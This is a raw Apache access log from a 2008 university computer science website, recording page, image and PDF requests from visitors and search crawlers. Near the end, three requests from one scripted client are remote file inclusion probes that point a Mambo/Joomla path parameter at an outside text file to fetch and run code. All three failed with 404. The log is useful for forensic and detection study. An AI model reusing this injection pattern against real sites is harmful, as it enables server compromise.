58.207.172.167 - - [23/Mar/2008:03:49:43 +0000] "GET /files/color/garland-7f82145e/bg-content.png HTTP/1.1" 200 265 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:43 +0000] "GET /files/color/garland-7f82145e/bg-content-right.png HTTP/1.1" 200 1847 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:44 +0000] "GET /files/color/garland-7f82145e/bg-content-left.png HTTP/1.1" 200 1949 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:44 +0000] "GET /files/color/garland-7f82145e/bg-navigation-item.png HTTP/1.1" 200 480 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:44 +0000] "GET /files/color/garland-7f82145e/menu-leaf.gif HTTP/1.1" 200 175 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:45 +0000] "GET /files/color/garland-7f82145e/bg-navigation-item-hover.png HTTP/1.1" 200 424 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:45 +0000] "GET /favicon.ico HTTP/1.1" 404 2758 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
58.207.172.167 - - [23/Mar/2008:03:49:45 +0000] "GET /favicon.ico HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (compatible; Google Desktop)"
58.207.172.167 - - [23/Mar/2008:03:49:47 +0000] "GET /files/color/garland-7f82145e/bg-navigation-item-hover.png HTTP/1.1" 200 424 "http://pvmmpi08.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MEGAUPLOAD 2.0)"
74.6.23.234 - - [23/Mar/2008:03:49:59 +0000] "GET /Postgraduates/PostgraduateStudents/kmccarthy.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
193.1.132.49 - - [23/Mar/2008:03:50:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
203.91.193.50 - - [23/Mar/2008:03:50:01 +0000] "GET /Staff/bsmyth/CV/BS-CV-Dec-2005.pdf HTTP/1.1" 200 656222 "http://www.google.co.in/search?q=DTV+domain&hl=en&start=20&sa=N";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
66.231.189.115 - - [23/Mar/2008:03:50:33 +0000] "GET /robots.txt HTTP/1.0" 200 1681 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)";;
66.231.189.91 - - [23/Mar/2008:03:50:33 +0000] "GET / HTTP/1.0" 200 5709 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)";;
77.91.224.21 - - [23/Mar/2008:03:50:40 +0000] "GET /Staff/AcademicStaff.html HTTP/1.1" 200 23910 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
65.214.44.29 - - [23/Mar/2008:03:51:16 +0000] "GET /Staff/cormac/rss.xml HTTP/1.1" 304 - "-" "Bloglines/3.1 (http://www.bloglines.com; 2 subscribers)"
74.6.25.34 - - [23/Mar/2008:03:51:21 +0000] "GET /2007/favicon.ico HTTP/1.0" 200 3638 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
203.144.160.250 - - [23/Mar/2008:03:51:49 +0000] "GET / HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
203.144.160.250 - - [23/Mar/2008:03:51:51 +0000] "GET /styles/ucd.css HTTP/1.1" 200 10944 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
65.55.208.46 - - [23/Mar/2008:03:51:52 +0000] "GET /Staff/AcademicStaff/bsmyth HTTP/1.1" 301 336 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
203.144.160.250 - - [23/Mar/2008:03:51:53 +0000] "GET / HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
203.144.160.250 - - [23/Mar/2008:03:51:48 +0000] "GET /UserFiles/publications/UCD-CSI-2007-4.pdf HTTP/1.1" 200 777708 "http://www.google.co.th/search?hl=th&q=Nearest+Neighbor+coverage+and+reachability&meta=";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
203.144.160.249 - - [23/Mar/2008:03:52:19 +0000] "GET / HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
203.144.160.249 - - [23/Mar/2008:03:52:18 +0000] "GET /UserFiles/publications/UCD-CSI-2007-4.pdf HTTP/1.1" 200 777708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
203.144.160.249 - - [23/Mar/2008:03:52:21 +0000] "GET /UserFiles/publications/UCD-CSI-2007-4.pdf HTTP/1.1" 206 755213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
77.91.224.11 - - [23/Mar/2008:03:52:58 +0000] "GET /Staff/ResearchStaff.html HTTP/1.1" 200 14911 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.20.151 - - [23/Mar/2008:03:53:24 +0000] "GET /UserFiles/publications/UCD-CSI-2007-2.pdf HTTP/1.0" 200 184766 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
67.195.44.110 - - [23/Mar/2008:03:53:33 +0000] "GET /robots.txt HTTP/1.0" 200 1681 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
77.91.224.21 - - [23/Mar/2008:03:53:33 +0000] "GET /Postgraduates/PostgraduatesList.html HTTP/1.1" 200 56386 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
60.53.110.237 - - [23/Mar/2008:03:53:42 +0000] "GET /Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html HTTP/1.1" 200 6468 "http://www.google.com.my/search?hl=en&q=MSC++six+cyber+laws&btnG=Google+Search&meta=";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:44 +0000] "GET /styles/ucd.css HTTP/1.1" 200 10944 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:45 +0000] "GET /SortList.js HTTP/1.1" 200 2856 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
67.195.53.161 - - [23/Mar/2008:03:53:46 +0000] "GET /rss.xml HTTP/1.0" 200 2926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
60.53.110.237 - - [23/Mar/2008:03:53:46 +0000] "GET /javascript/email.js HTTP/1.1" 200 359 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:47 +0000] "GET /UserFiles/Image/logo.gif HTTP/1.1" 200 3085 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:47 +0000] "GET /UserFiles/Image/header.gif HTTP/1.1" 200 11718 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:48 +0000] "GET /UserFiles/Image/ucd_submit.gif HTTP/1.1" 200 197 "http://csiweb.ucd.ie/Postgraduates/Taught_Degrees/H.Dip/MScForensicComputingandCyberCrimeInvestigation.html";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:48 +0000] "GET /UserFiles/Image/background_3_columns.gif HTTP/1.1" 200 84 "http://csiweb.ucd.ie/styles/ucd.css";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:49 +0000] "GET /UserFiles/Image/background_header1.gif HTTP/1.1" 200 579 "http://csiweb.ucd.ie/styles/ucd.css";; "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:49 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
60.53.110.237 - - [23/Mar/2008:03:53:52 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
193.120.116.178 - - [23/Mar/2008:03:54:02 +0000] "GET /UserFiles/Image/background_header1.gif HTTP/1.1" 200 579 "-" "Mozilla/4.0 (compatible;)"
203.144.160.250 - - [23/Mar/2008:03:51:55 +0000] "GET /UserFiles/publications/UCD-CSI-2007-4.pdf HTTP/1.1" 206 752053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)"
74.6.23.165 - - [23/Mar/2008:03:54:55 +0000] "GET /affiliations.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
193.1.132.49 - - [23/Mar/2008:03:55:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
77.91.224.11 - - [23/Mar/2008:03:55:12 +0000] "GET /Staff/SupportStaff.html HTTP/1.1" 200 9253 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.25.112 - - [23/Mar/2008:03:55:13 +0000] "GET /UserFiles/publications/1125310875430.pdf HTTP/1.0" 200 121314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
65.55.208.46 - - [23/Mar/2008:03:55:28 +0000] "GET /Staff/AcademicStaff/bsmyth/ HTTP/1.1" 200 77886 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
74.6.27.159 - - [23/Mar/2008:03:56:02 +0000] "GET /staff/aquigley/home/downloads/Hdip-Info-Sheet.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
203.91.193.50 - - [23/Mar/2008:03:56:30 +0000] "GET /Staff/bsmyth/ HTTP/1.1" 403 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:33 +0000] "GET /Staff/ HTTP/1.1" 200 3633 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:34 +0000] "GET /styles/ucd.css HTTP/1.1" 304 - "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:34 +0000] "GET /javascript/email.js HTTP/1.1" 304 - "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:34 +0000] "GET /UserFiles/Image/header.gif HTTP/1.1" 200 11718 "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:34 +0000] "GET /UserFiles/Image/logo.gif HTTP/1.1" 200 3085 "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:34 +0000] "GET /UserFiles/Image/ucd_submit.gif HTTP/1.1" 200 197 "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:38 +0000] "GET /Staff/AcademicStaff.html HTTP/1.1" 200 23910 "http://csiweb.ucd.ie/Staff/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:38 +0000] "GET /UserFiles/Image/background_index_top_box.gif HTTP/1.1" 200 67 "http://csiweb.ucd.ie/Staff/AcademicStaff.html";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:47 +0000] "GET /Staff/AcademicStaff/jberndsen HTTP/1.1" 301 339 "http://csiweb.ucd.ie/Staff/AcademicStaff.html";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:47 +0000] "GET /Staff/AcademicStaff/jberndsen/ HTTP/1.1" 200 11406 "http://csiweb.ucd.ie/Staff/AcademicStaff.html";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:48 +0000] "GET /UserFiles/Image/background_2_columns_left.gif HTTP/1.1" 200 67 "http://csiweb.ucd.ie/Staff/AcademicStaff/jberndsen/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:48 +0000] "GET /UserFiles/Image/jberndsen.jpg HTTP/1.1" 200 6279 "http://csiweb.ucd.ie/Staff/AcademicStaff/jberndsen/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:56:48 +0000] "GET /UserFiles/Image/bullet.gif HTTP/1.1" 200 61 "http://csiweb.ucd.ie/Staff/AcademicStaff/jberndsen/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
77.91.224.11 - - [23/Mar/2008:03:56:51 +0000] "GET /News/Vacancies.html HTTP/1.1" 200 3635 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
193.1.172.46 - - [23/Mar/2008:03:57:35 +0000] "GET /staff/aquigley/home/index.php?Links:Questions:Newman_House HTTP/1.0" 200 12864 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
203.91.193.50 - - [23/Mar/2008:03:57:38 +0000] "GET / HTTP/1.1" 200 6631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:38 +0000] "GET /UserFiles/Image/logo.gif HTTP/1.1" 200 3085 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:38 +0000] "GET /UserFiles/Image/header.gif HTTP/1.1" 200 11718 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:38 +0000] "GET /UserFiles/Image/ucd_submit.gif HTTP/1.1" 200 197 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:38 +0000] "GET /UserFiles/Image/jcarthy_sig.jpg HTTP/1.1" 200 7266 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
193.1.172.46 - - [23/Mar/2008:03:57:38 +0000] "GET /robots.txt HTTP/1.0" 404 289 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
193.1.172.46 - - [23/Mar/2008:03:57:38 +0000] "GET /staff/aquigley/home/index.php?Personal HTTP/1.0" 200 12042 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
203.91.193.50 - - [23/Mar/2008:03:57:39 +0000] "GET /UserFiles/Image/background_index_top_box.gif HTTP/1.1" 200 67 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:39 +0000] "GET /UserFiles/Image/background_header1_orange.gif HTTP/1.1" 200 579 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:39 +0000] "GET /UserFiles/Image/background_header1.gif HTTP/1.1" 200 579 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:57:39 +0000] "GET /UserFiles//Image/workshop_headline.jpg HTTP/1.1" 200 3126 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
77.91.224.21 - - [23/Mar/2008:03:57:47 +0000] "GET /News/seminars/ HTTP/1.1" 200 2931 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
193.1.172.46 - - [23/Mar/2008:03:57:58 +0000] "GET /UserFiles/publications/1124709633609.pdf HTTP/1.0" 200 144000 "-" "gsa-crawler (Enterprise; M2-N7RQ5RABCA2JT; unix@ucd.ie,fergal@ucd.ie)"
203.91.193.50 - - [23/Mar/2008:03:57:59 +0000] "GET /Research/index.html HTTP/1.1" 200 9339 "http://csiweb.ucd.ie/";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:58:00 +0000] "GET /UserFiles/Image/background_2_columns_left.gif HTTP/1.1" 200 67 "http://csiweb.ucd.ie/Research/index.html";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
203.91.193.50 - - [23/Mar/2008:03:58:07 +0000] "GET /Research/TechnicalReports.html HTTP/1.1" 200 25104 "http://csiweb.ucd.ie/Research/index.html";; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
74.6.9.62 - - [23/Mar/2008:03:58:23 +0000] "GET /staff/alexey/p403/L04.ppt HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
74.6.26.124 - - [23/Mar/2008:03:58:56 +0000] "GET /staff/jmurphy/networks/csd8_5-datalink_3.pdf HTTP/1.0" 200 792012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
77.91.224.11 - - [23/Mar/2008:03:59:02 +0000] "GET /News/OpportunitiesDay/ HTTP/1.1" 200 4408 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.31.114 - - [23/Mar/2008:03:59:17 +0000] "GET /staff/aquigley/home/?Links:Dublin&login HTTP/1.0" 401 14100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)";;
64.208.172.178 - - [23/Mar/2008:03:59:47 +0000] "GET /robots.txt HTTP/1.0" 404 288 "-" "ia_archiver"
64.208.172.178 - - [23/Mar/2008:03:59:47 +0000] "GET /students/pcotter/default.htm HTTP/1.0" 404 306 "-" "ia_archiver"
77.91.224.11 - - [23/Mar/2008:03:59:49 +0000] "GET /Research/TechnicalReports.html HTTP/1.1" 200 25104 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
193.251.20.27 - - [23/Mar/2008:03:59:59 +0000] "GET /UserFiles/fourthyear//index1.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cuzz/safe.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.803"
193.251.20.27 - - [23/Mar/2008:03:59:59 +0000] "GET //index1.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cuzz/safe.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
193.251.20.27 - - [23/Mar/2008:03:59:59 +0000] "GET /UserFiles//index1.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cuzz/safe.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
193.1.132.49 - - [23/Mar/2008:04:00:01 +0000] "GET /cron.php HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)"
77.91.224.21 - - [23/Mar/2008:04:00:43 +0000] "GET /News/CSINewletters/ HTTP/1.1" 200 4217 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
65.55.104.11 - - [23/Mar/2008:04:01:15 +0000] "GET /staff/nick/home/research/wrappers HTTP/1.1" 404 311 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)";;
77.91.224.11 - - [23/Mar/2008:04:02:02 +0000] "GET /Research/ResearchSpecialization.html HTTP/1.1" 200 9082 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"